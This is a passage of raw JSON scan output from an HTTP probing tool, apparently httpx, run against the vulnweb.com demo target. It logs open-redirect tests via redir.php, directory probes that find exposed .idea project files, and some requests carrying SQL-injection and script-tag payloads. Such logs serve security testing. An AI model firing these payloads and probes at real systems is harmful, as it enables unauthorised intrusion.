estphp.vulnweb.com/redir.php?r=http://seonews1772.blogspot.com/management.html\",\"location\":\"http://seonews1772.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1772.blogspot.com/management.html\",\"time\":\"343.146474ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:03.96142407Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1787.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1787.blogspot.com/\",\"location\":\"http://seonews1787.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1787.blogspot.com/\",\"time\":\"356.546979ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:04.013643656Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1787.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1787.blogspot.com/management.html\",\"location\":\"http://seonews1787.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1787.blogspot.com/management.html\",\"time\":\"352.329272ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:05.717701666Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1789.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1789.blogspot.com/\",\"title\":\"502 Bad Gateway\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1789.blogspot.com/\",\"time\":\"354.081227ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":502,\"content_length\":559,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:06.989682596Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1789.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1789.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:07.022519357Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1790.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1790.blogspot.com/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:07.354778197Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1790.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1790.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.194731984Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1795.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1795.blogspot.com/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.243595099Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1795.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1795.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.26222955Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1796.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1796.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.276312276Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1804.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1804.blogspot.com/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.625757249Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1806.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1806.blogspot.com/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.727338819Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1807.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1807.blogspot.com/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.813828599Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1804.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1804.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.855920269Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1809.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1809.blogspot.com/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.881711292Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1806.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1806.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.913474113Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1809.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1809.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.942418952Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1811.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1811.blogspot.com/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:08.945713933Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1807.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1807.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:09.013977376Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1811.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1811.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:09.116651805Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1812.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1812.blogspot.com/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:09.459687193Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1813.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1813.blogspot.com/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:09.577710021Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1812.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1812.blogspot.com/management.html\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:10.471015826Z\",\"url\":\"http://testphp.vulnweb.com:80/\",\"input\":\"http://testphp.vulnweb.com:80/\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:32:11.354441466Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/ /listproducts.php\",\"input\":\"http://testphp.vulnweb.com:80/%20/listproducts.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%20/listproducts.php\",\"time\":\"351.801294ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:12.40362297Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/ HTTP/1.1\",\"input\":\"http://testphp.vulnweb.com:80/%20HTTP/1.1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%20HTTP/1.1\",\"time\":\"348.302208ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:13.13164973Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/ Web Server\",\"input\":\"http://testphp.vulnweb.com:80/%20Web%20Server\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%20Web%20Server\",\"time\":\"351.530253ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:13.38259043Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/\\u003cscript\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/%3Cscript%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%3Cscript%3E\",\"time\":\"351.407959ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:13.38840124Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/ ip\",\"input\":\"http://testphp.vulnweb.com:80/%20ip\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%20ip\",\"time\":\"360.664852ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:13.459947248Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/مخلهد\",\"input\":\"http://testphp.vulnweb.com:80/%D9%85%D8%AE%D9%84%D9%87%D8%AF\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%D9%85%D8%AE%D9%84%D9%87%D8%AF\",\"time\":\"346.438961ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:13.468093528Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/\\u0026fcbz=1\",\"input\":\"http://testphp.vulnweb.com:80/\\u0026fcbz=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\\u0026fcbz=1\",\"time\":\"356.087052ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:13.841713212Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/'\",\"input\":\"http://testphp.vulnweb.com:80/'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/'\",\"time\":\"347.401673ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:14.185894186Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/'1=1'\",\"input\":\"http://testphp.vulnweb.com:80/'1=1'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/'1=1'\",\"time\":\"352.210244ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:14.263725272Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/(用的看到demo,如果侵权请告知我)\",\"input\":\"http://testphp.vulnweb.com:80/(%E7%94%A8%E7%9A%84%E7%9C%8B%E5%88%B0demo,%E5%A6%82%E6%9E%9C%E4%BE%B5%E6%9D%83%E8%AF%B7%E5%91%8A%E7%9F%A5%E6%88%91)\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%28%E7%94%A8%E7%9A%84%E7%9C%8B%E5%88%B0demo,%E5%A6%82%E6%9E%9C%E4%BE%B5%E6%9D%83%E8%AF%B7%E5%91%8A%E7%9F%A5%E6%88%91%29\",\"time\":\"342.850038ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:14.320972946Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/)\",\"input\":\"http://testphp.vulnweb.com:80/)\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/)\",\"time\":\"357.613384ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:14.440119617Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/-1' OR 3*2*1=6 AND 000310=000310 --\",\"input\":\"http://testphp.vulnweb.com:80/-1'%20OR%203*2*1=6%20AND%20000310=000310%20--\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/-1%27%20OR%203%2A2%2A1=6%20AND%20000310=000310%20--\",\"time\":\"346.190025ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:14.450473506Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/.idea\",\"input\":\"http://testphp.vulnweb.com:80/.idea\",\"location\":\"http://testphp.vulnweb.com/.idea/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea\",\"time\":\"351.248808ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:14.513763663Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/.idea/encodings.xml\",\"input\":\"http://testphp.vulnweb.com:80/.idea/encodings.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/encodings.xml\",\"time\":\"356.367667ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":10,\"lines\":6,\"status_code\":200,\"content_length\":171,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:14.516366233Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/.idea/acuart.iml\",\"input\":\"http://testphp.vulnweb.com:80/.idea/acuart.iml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/acuart.iml\",\"time\":\"351.629186ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":29,\"lines\":10,\"status_code\":200,\"content_length\":292,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:14.520396688Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/.idea/misc.xml\",\"input\":\"http://testphp.vulnweb.com:80/.idea/misc.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/misc.xml\",\"time\":\"346.398857ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":18,\"lines\":9,\"status_code\":200,\"content_length\":266,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:14.885326553Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/.idea/modules.xml\",\"input\":\"http://testphp.vulnweb.com:80/.idea/modules.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/modules.xml\",\"time\":\"343.925567ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":26,\"lines\":10,\"status_code\":200,\"content_length\":275,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.003626594Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/.idea/scopes\",\"input\":\"http://testphp.vulnweb.com:80/.idea/scopes\",\"location\":\"http://testphp.vulnweb.com/.idea/scopes/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/scopes\",\"time\":\"344.39345ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.075564401Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/.idea/scopes/scope_settings.xml\",\"input\":\"http://testphp.vulnweb.com:80/.idea/scopes/scope_settings.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/scopes/scope_settings.xml\",\"time\":\"351.577469ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":13,\"lines\":5,\"status_code\":200,\"content_length\":143,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.234646003Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/.idea/vcs.xml\",\"input\":\"http://testphp.vulnweb.com:80/.idea/vcs.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/vcs.xml\",\"time\":\"338.926842ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":16,\"lines\":8,\"status_code\":200,\"content_length\":173,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.338277854Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/.idea/workspace.xml\",\"input\":\"http://testphp.vulnweb.com:80/.idea/workspace.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/workspace.xml\",\"time\":\"354.451749ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1702,\"lines\":217,\"status_code\":200,\"content_length\":12473,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.36651009Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/1\",\"input\":\"http://testphp.vulnweb.com:80/1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/1\",\"time\":\"347.989891ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.496081067Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/123\",\"input\":\"http://testphp.vulnweb.com:80/123\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/123\",\"time\":\"347.811399ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.499487486Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/192.168.43.115\",\"input\":\"http://testphp.vulnweb.com:80/192.168.43.115\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/192.168.43.115\",\"time\":\"352.135898ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.551407439Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/99\",\"input\":\"http://testphp.vulnweb.com:80/99\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/99\",\"time\":\"346.246941ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.553381294Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX\",\"input\":\"http://testphp.vulnweb.com:80/AJAX\",\"location\":\"http://testphp.vulnweb.com/AJAX/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX\",\"time\":\"342.794394ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.582058314Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/artists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/artists.php\",\"time\":\"353.735354ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":7,\"lines\":1,\"status_code\":200,\"content_length\":146,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:15.924869437Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/htaccess.conf\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/htaccess.conf\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/htaccess.conf\",\"time\":\"342.813753ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":2,\"status_code\":200,\"content_length\":60,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:16.039793646Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/AJAX/index.html\",\"input\":\"http://testphp.vulnweb.com:80/AJAX/index.html\",\"title\":\"404 Not 